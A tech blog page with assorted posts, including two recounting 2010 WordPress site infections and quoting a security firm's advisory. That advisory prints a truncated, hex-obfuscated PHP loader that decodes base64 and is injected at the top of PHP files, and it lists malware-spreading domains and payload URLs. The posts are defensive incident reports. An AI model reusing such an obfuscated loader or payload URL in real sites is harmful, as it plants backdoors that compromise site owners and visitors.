Jan 092016

:: justy ::

contact :: J ::

Justy, my She-Geeks.com partner, co-creator of this collaboration and dear friend, passed away November 2015.  She is very missed both on this site and in our lives.  In an effort to continue to give back, I will be donating a portion of each She-Geeks shop sale to her son, little Landon.

Pick Up Some Geek Gear Today and Show Your Support.  ;)

-

-

http://www.cafepress.com/shegeeks

-

Justy, you are missed…


-



-

*Keep and eye out for new geeky posts to come for 2016 as we pump new life into She-Geeks.com in Justy’s memory*

-

-

VN:F [1.9.6_1107]
Rating: 0.0/10 (0 votes cast)
VN:F [1.9.6_1107]
Rating: 0 (from 0 votes)
Posted by admin Tagged with: , , , , , , , , ,
Oct 312010

One of my blogs was hit today (Happy Halloween) by this new strain of WordPress Blog attacks.  The Sucuri Team was able to tackle the infection without issue and has posted some good information on the latest version attacking (at this point) Godaddy servers.  Read more below:

“Just a quick update to this blog post: More Attacks – insomniaboldinfocom.com.

We posted a few days ago that attackers were using insomniaboldinfocom.com to spread malware to multiple web sites. Today, they changed domains and are targeting GoDaddy sites usinginsomniaboldinfoorg.com.

The following domains/IP addresses are being used to spread the attack:

http://insomniaboldinfoorg.com/ll. php?k=1

www3.hope-soft57. net
www3.new-protectionsoft23. in
www4.free-pc-protection9. in

http://insomniaboldinfocom.com/mm. php

http://insomniaboldinfonet.com/mm. php

www3.large-defense1. in

All the sites we’ve seen so far have the following code added to all PHP files:

$_8b7b="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f..
\x6e";$_8b7b1f="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";..
$_8b7b1f56=$_8b7b("",$_8b7b1f("aWYoZnVuY..

Which is basically just the eval(base64_decode encoded. What is interesting is that this site is hosted at 77.78.239.53, which was used on previous attacks by the “Hilary Kneber” group, so we think they are all related:

myblindstudioinfoonline. com
meqashoppercom. com
insomniaboldinfocom. com

The following script should clean up any infected site: http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html

Click this link for more info on Sucuri’s Security Services!

VN:F [1.9.6_1107]
Rating: 0.0/10 (0 votes cast)
VN:F [1.9.6_1107]
Rating: +1 (from 1 vote)
Posted by admin Tagged with: , , , , , , , , , , , , , ,
Jun 132010

wordpress threat detectedMany of you over the past few months have experienced the onslaught of WordPress attacks which has plagued site owners – and loyal fans, alike.  I maintain multiple WordPress blogs in addition to our beloved She-geeks.com site, as well as my clients’ WordPress blogs.  While refraining from too much detail, I had the unfortunate duty of ridding two such WordPress websites of these WordPress attacks.  While both of the blogs I’m referring to maintained updated software (plugins and core files), they still fell victim to these attacks.  The attacks I am referring to primarily affected PHP pages, which would mean that A LOT of sites out there on the internet had the potential for infection.  The code would essentially insert itself into each PHP page on your site and/or WordPress blog and add strings of code which contained “eval(base64_decode“ in some way, shape or form.  This script is generally found at the very top of the page’s code – I assume so it hits first.

I spent hours upon hours working to isolate the issues and hand-remove the malicious code only to have it reappear a week later.  I ultimately had to bring on the “big dogs” in WordPress blog security, Sucuri.net.  David and the rest of the Sucuri Crew were able to solve all site issues within 30 minutes.  It was a beautiful thing.  You see, although I managed to remove most of the “malicious eval code” during these attacks myself, there appeared to be a snippet of code eluding my capture.  This code, also referred to as a backdoor by many, was hiding in the shadows of unending lines of code.  Its really too much code to parse through with the naked eye…nevermind the fact that manual removal like that is likely not the most efficient method when time (and money) is of the essence.  What can I say, I was stubborn.   Needless to say, the Sucuri Crew was very efficient and truly a life saver on that day.

Below I’ve outlined some of what I found online pertaining to the malicious attacks as well as some portions from my personal experience with the nefarious code.

Some of the malicious strings of code which were present:

“http://holasionweb dot com/oo dot php”

holasion web

There are a few mentions of solutions you can try but, in the end, the only solution which seemed to work in my case was enlisting Sucuri’s help.  However, I’ll list a few better known solutions for this type of WordPress attack:

  1. completely deleting your WordPress install and reinstalling on your hosting account (note: not fun)
  2. logging into your hosting provider and accessing an CLEAN archive version of your website. (note: you’d need to know an archived date in which your blog was completely clean and free of the bad code)
  3. Sucuri offers a free “cleaning” script which you can run yourself and seems to have helped quite a few people resolve their issues

Additional documented information which may prove useful for others is shown below.  You may see some similarities.  If you’ve collected any additional information or have a similar story to share, we’re all ears.

Xorg malware info

Holasion web info

realsafe malware info

suitecase52 malware info

More information on Sucuri Security:

“Sucuri Security is the leading provider of web-based integrity monitoring and malware detection solutions – delivered as a service. Sucuri solutions are deployed remotely in a matter of minutes anywhere in the world, allowing our customers to immediately detect web-based malware and monitor their internet presence. Sucuri’s web monitoring solution is used today by more than 8,000 sites worldwide. Sucuri was founded in 2008.

In simple terms, we clean up the mess. If your site got hacked, blacklisted or infected with malware, we fix it for you. If your site is clean, we monitor it to let you know if a problem ever happens. We work fast, we are affordable and we get things done.”

Click here to check them out: sucuri security

VN:F [1.9.6_1107]
Rating: 0.0/10 (0 votes cast)
VN:F [1.9.6_1107]
Rating: 0 (from 0 votes)
Posted by admin Tagged with: , , , , , , , , , , , , , , , ,
May 102010

Followers gone – don’t panic   ;0)

Twitter Bug Lost Followers

It appears a bug has popped up on Twitter today.  Apparently this bug “allows users to make anyone follow them“.  I’m sure you can see how this could be a bit of an issue for Twitter and it’s loyal clan.  Some of the details on this snafu are:  “writing “[tweet] accept [username]” then the [username] immediately starts following you.”

Want to know more, check out some of these sources:

http://www.ibtimes.com/articles/20100310/17-pct-twitter-users-havefollowers.htm

http://eu.techcrunch.com/2010/05/10/does-this-twitter-bug-force-anyone-to-follow-you/

http://mashable.com/2010/05/10/twitter-follow-bug/

Lets hope those Twitter Follow stats bounce back soon!

:: swytch ::

VN:F [1.9.6_1107]
Rating: 0.0/10 (0 votes cast)
VN:F [1.9.6_1107]
Rating: +2 (from 2 votes)
Posted by admin Tagged with: , , , , , , ,
Apr 142010

While surfing the internet with my “lab rat hat” on, I came across various articles and videos on “How To Build An Oil Cooled PC”.  I thought to myself, OMG seriously?

Apparently, not only to hardware gearheads do this, but they sell these pre-made PCs online.

They also offer DIY computer kits for the adventurous ones out there.

-

So, you may ask, how is this aberration of nature possible?  Well mineral oil is non-conductive.  It is actually possible – though potntially mind-bending – to submerge your PCs shinny parts into mineral oil (cleanest option).  Though I doubt I’ll even be moved to attempt this myself, I do find it strangely interesting.  :)

Here are a few brief videos on hard-core enthusiasts at work!

:the End :: :: swytch ::

VN:F [1.9.6_1107]
Rating: 0.0/10 (0 votes cast)
VN:F [1.9.6_1107]
Rating: 0 (from 0 votes)
Posted by swytch Tagged with: , , , , , , ,
Apr 132010

4sqday logo

4Square Day 2010 is approaching and the buzz around the social networks is really starting to pick up.  Interestingly, though, its not just about “social”.  This morning I noticed tweet after tweet from local businesses offering discounts and deals for the nationwide 4Square event.

If you surf over to their website, you’ll find a listing of the “Top Participating Cities” such as:

(big props to FL & GIT Tampa!   ;P  )

There are also currently some “4square swarm parties” scheduled:

Tampa Bay, FL USA Swarm

Foursquare Day Global Swarm

There are a few other sources for information such as:

Twitter:  http://twitter.com/4sqday

(hashtags: #4SQDay, #4sqday

Facebook: http://www.facebook.com/FoursquareDay

For more information on the 4Square Day events in your area, visit:  http://4sqday.com/

:: swytch  ::

VN:F [1.9.6_1107]
Rating: 0.0/10 (0 votes cast)
VN:F [1.9.6_1107]
Rating: 0 (from 0 votes)
Posted by admin Tagged with: , , , , , , , ,
Jan 202010

01.27.09 by:: swytch

I’m sure many of you have encountered this devlish BSOD (blue screen of death) at least once in your lifetime.

unmountable boot volume

In my line of work, people tend to come to me in utter anguish praying they haven’t lost their files. Most of the time I can get the user up and running again within a short period of time but there are those times…. well, I’ll just re-emphasize the need to BACK UP YOUR DATA. :0)

Here are a few steps which I used to get my laptop back in shape. (steps below reference Windows XP but can be help troubleshooting other operating systems)

Step 1 – Located my Windows XP operating system disk. With my XP disk in the CD-rom drive, I powered up the computer. When prompted, I booted to the CD drive and not the internal hard drive. At that point I began to see XP starting its boot and restore process.

boot from windows CD

Step 2 – When prompted, select “R” to repair the current XP installation. You will then be brought to the Windows System Repair prompt shown below.

windows xp setup

Step 3 – I resolved the situation using both the FIXBOOT and FIXMBR commands.

windows fixboot and fixmbr commands

original photo: http://www.windowsnetworking.com

I ran the FIXBOOT command first, then rebooted the machine to see if it solved the problem. It didn’t so I proceeded with the FIXMBR command and tested again.

Step 4 – I returned to the Windows Recovery Console and ran the chkdsk command with a ” /r ” for recover.

chkdsk command

After I completed the steps above, I performed a full shutdown.
I booted the laptop and we were back in action! These are the steps that I took but know that there are many more commands you can use in the Windows Recovery Console.

Check out some of these sources for additional information:

http://support.microsoft.com/kb/297185
http://www.wikihow.com/Use-Windows-Recovery-Console-from-XP-CD
http://commandwindows.com/recovery.htm

VN:F [1.9.6_1107]
Rating: 0.0/10 (0 votes cast)
VN:F [1.9.6_1107]
Rating: 0 (from 0 votes)
Posted by admin Tagged with: , , ,
Aug 202009

09.10.08 by:: swytch

Many of you, myself included, have run into pretty interesting jpgs or gifs created using pure ASCII text. I have always wondered if there was a free and easy way for me to create my own ASCII text without losing my mind completely and attempting it “by hand”.
Well, when wondering the ether recently I discovered a free program called “pic2ascii”. Information on the program and its creator:

ascii

During my first complete run of this program, I used the following scooter graphic as a target.

Scooter

Scooter

I simply clicked ASCII-Table in the top bar and chose “fill with all possible characters”. This loaded the ASCII information I needed to complete this process. I also saved that table as a text file (option available through the ASCII-Table drop down).
Next I browsed to my target graphic and chose the preferred font for this run.
Click START and wait for the pop-up box stating the process is complete!
Pic2ASCII rendered the following ASCII image relatively quickly.

scooter

The ASCII image the program rendered was quite large so I decided to decrease the size of the target scooter graphic. This rendered a slightly more manageable output. See below.

scooter

Now, being relatively excited about ASCII rendering, I decided to take it up a notch and find a program which would do this in color. I came across the free ZW Text Mosaic program.
Once installed, I decided to demo the program with the same scooter graphic used previously.
Using the same picture but rendering it with ZW Text Mosaic

scooter

scooter

In addition to the color option, you can actually type in text you wish to use during the rendering process. Of course, I used she-geeks.com as my text.
Once the image has been generated, you can choose either Show or Open to view the graphic.
All in all, these programs are straightforward enough that anyone can have a bit of fun using them. Get creative and enjoy! J

VN:F [1.9.6_1107]
Rating: 0.0/10 (0 votes cast)
VN:F [1.9.6_1107]
Rating: 0 (from 0 votes)
Posted by admin Tagged with: , ,
Feb 062008

02.06.08 by swytch

Ok, how many of you out there are completely aggravated with ms office 2007? I mean some of the UI is nice but I can’t find what I need…and that makes me one angry grrl. The point of this drivel is outlook email headers. Most of us out there know how to get to the header information in previous versions of outlook so i won’t go into detail on that. Why would i look at email header information, you say? Who cares, you say? You care. i mean, if you’ve ever gotten SPAM (we know you have) and wanted to know where that pointless piece of electronic waste came from, you look at email headers. With that said, here is the skinny on checking header information in outlook 2007:

Viewing Full Header Information in MS Outlook 2007

The following information is useful in checking suspicious email messages:

Viewing Full Header Information in MS Outlook 2007:For Outlook 2007:

1. Open Outlook.
2. Open a message.
3. On the Message tab, in the Options group, click the Dialog Box Launcher icon image.
4. In the Message Options dialog box, the headers appear in the Internet headers box.

For older versions of Outlook:

1. Open Outlook.
2. Open the message you’d like to view headers for.
3. Click the View menu, and select Options…. The full headers will appear in a new window.

See how simple that was? The rest is up to you. Don’t say I didn’t warn ya!

VN:F [1.9.6_1107]
Rating: 0.0/10 (0 votes cast)
VN:F [1.9.6_1107]
Rating: 0 (from 0 votes)
Posted by admin Tagged with: , , , ,
Feb 062008

02.06.08 by:: swytch

So, you’re on a network (with permission, of course) and suddenly you find you can no longer access a certain file or folder….what to do? Try this little trick:

To adjust, set or regain file/access permissions:Folder Permissions:

When permissions are lost on a file or folder, Administrator (or yourself) must take ownership of it to recover/adjust to the proper permissions.

Right click on the file in question and select Security.When prompted with a warning that “you only have rights to view”, click ok.

Click on the Advanced Tab.

Click on the Ownership Tab

To change ownership, select Administrator (or your username) and click OK.

Click OK again to close the window.

Now,

Right-click on that file again and adjust the rights to what they should be.
Ahhh…with any luck on your end, access is yours.

VN:F [1.9.6_1107]
Rating: 0.0/10 (0 votes cast)
VN:F [1.9.6_1107]
Rating: 0 (from 0 votes)
Posted by admin Tagged with: , , ,
Rss Feed Tweeter button Facebook button Technorati button Myspace button Digg button Stumbleupon button Newsvine button Youtube button

© 2010-2017 She-Geeks.com All Rights Reserved